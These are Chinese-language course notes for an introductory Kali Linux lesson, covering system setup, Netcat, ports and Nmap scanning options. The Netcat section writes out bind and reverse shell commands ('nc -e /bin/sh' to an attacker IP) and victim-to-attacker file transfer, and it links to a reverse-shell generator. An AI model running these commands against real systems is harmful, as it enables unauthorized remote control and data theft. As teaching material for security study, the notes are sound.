21430 - 06. Kali Linux 基础应用

一、课程内容概要

1、Kali 系统优化

2、Netcat

3、端口

4、Nmap

二、重点知识与细节
1、Kali 系统优化

Kali 工具文档：https://www.kali.org/tools/

• 系统提权
  # 步骤1：添加一个root用户，输入密码时不会显示。通过`su -` 切到root用户，执行所有命令
  sudo passwd root
  # 步骤2：添加当前用户到sudo组
  # 步骤2.1 切换到root用户下
  su -
  # 步骤2.2 添加当前用户到sudo组
  gpasswd -a '你的用户名' sudo
• 更换国内镜像源
  vim /etc/apt/sources.list# 中科大：
  deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
  deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
  ​
  # 阿里云:
  deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
  deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
  ​
  # 清华大学：
  deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
  deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
• 更新软件数据库：apt update
• 更新软件：apt upgrade
• 设置语言包：dpkg-reconfigure locales
• 修改缩放比率：hidp
  
  

2、Netcat：nc [可选参数] ip 端口

• 正向 shell：
  
  
  • Linux 控制 Windows
    
    
    • Windows 绑定 CMD 到本地 5566 端口：nc -e cmd -lvp 5566
    • Linux 主动连接目标 5566：nc ip地址 5566
      
      
  • Windows 控制 Linux
    
    
    • Linux 绑定 SH 到本地 5566 端口：nc -e /bin/sh -lvp 5566
    • Windows 主动连接目标 5566：nc ip地址 5566
      
      
  • Linux 控制 Linux
    
    
    • Linux 受害者绑定 SH 到本地 5566 端口：nc -e /bin/sh -lvp 5566
    • Linux 攻击者主动连接目标 5566：nc ip地址 5566
      
      
  • Windows 控制 Windows
    
    
    • Windows 受害者绑定 CMD 到本地 5566 端口：nc -e cmd -lvp 5566
    • Windows 攻击者主动连接目标5566：nc ip地址 5566
      
      
    
    
• 反向 shell：
  反弹 shell 生成：https://forum.ywhack.com/reverse-shell/
  
  
  • 控制 Linux
    
    
    • 攻击者等待 5566 连接：nc -lvvp 5566
    • 受害者 Linux 绑定 CMD 到目标 5566 端口：nc -e /bin/sh ip地址 5566
      
      
  • 控制 Windows
    
    
    • 攻击者等待5566连接：nc -lvvp 5566
    • 受害者Windows绑定CMD到目标5566端口：nc -e cmd ip地址 5566
      
      
    
    
• 传输文件内容：
  攻击者（服务端/接收）：nc -lvp 端口号 > 1.txt
  受害者（客户端/发送）：nc ip地址 端口号 < 1.txt
  攻击者的文件名可以随便起，受害者这边必须得有这个文件才能发送。
  
  
  • 正向：攻击者主动去连接受害者
    
    
    • 受害者：nc -e /bin/sh -lvp 5566（Linux）nc -e cmd -lvp 5566（Windows）
    • 攻击者：nc 受害者ip地址 端口
      
      
  • 反向：受害者主动来连接攻击者
    
    
    • 攻击者：nc -lvvp 5566
    • 受害者： nc -e /bin/sh 攻击者ip地址 端口、nc -e cmd 攻击者ip地址 端口
      
      
    
    
  
  

3、端口

端口范围：1 ~ 65535

端口占用：netstat -tulnp

4、Nmap

Nmap使用教程图文教程：https://zhuanlan.zhihu.com/p/585377081

Nmap脚本使用总结：https://wooyun.js.org/drops/nmap%E8%84%9A%E6%9C%AC%E4%BD%BF%E7%94%A8%E6%80%BB%E7%BB%93.html

• 端口扫描：扫描主机的开放端口。
  
  
  • 指定端口扫描：nmap 主机IP -p 端口
  • 指定扫描方式：
    
    
    • TCP 全连接扫描：nmap 主机IP -p 端口 -sT
    • SYN 半链接扫描：nmap 主机IP -p 端口 -sS
    • Fin 扫描：nmap 主机IP -p 端口 -sF
    • Null 扫描：nmap 主机IP -p 端口 -sN
    • Xmas 扫描：nmap 主机IP -p 端口 -sX
      
      
    
    
• 主机探测：不扫描端口，只扫描存活主机。本质上是 Ping 扫描。
  nmap -sP 主机IP
• 服务识别：扫描端口时，默认显示端口对应的服务，但不显示服务版本。
  nmap 主机IP -p 端口 -sV
• 系统识别：扫描端口时，识别主机的操作系统版本。
  nmap 主机IP -p 端口 -O
• 结果导出：将扫描结果保存到文件。
  nmap 主机IP -p 端口 -oN result.txt
  nmap 主机IP -p 端口 -oX result.xml
  
  

三、作业

1、对自己的kali系统进行优化

2、使用nmap中的脚本扫描自己的局域网主机

3、结合自己的理解，说明什么是端口，什么是服务，它俩之间的联系是什么

端口是计算机操作系统与其他设备的通讯接口，服务是操作系统上运行的程序进程，服务需要通过端口发送或接收数据包完成与其他设备的通讯交互，而且一个端口在同一时间下仅可被一个服务占用，一个服务可以占用多个端口进行设备通讯。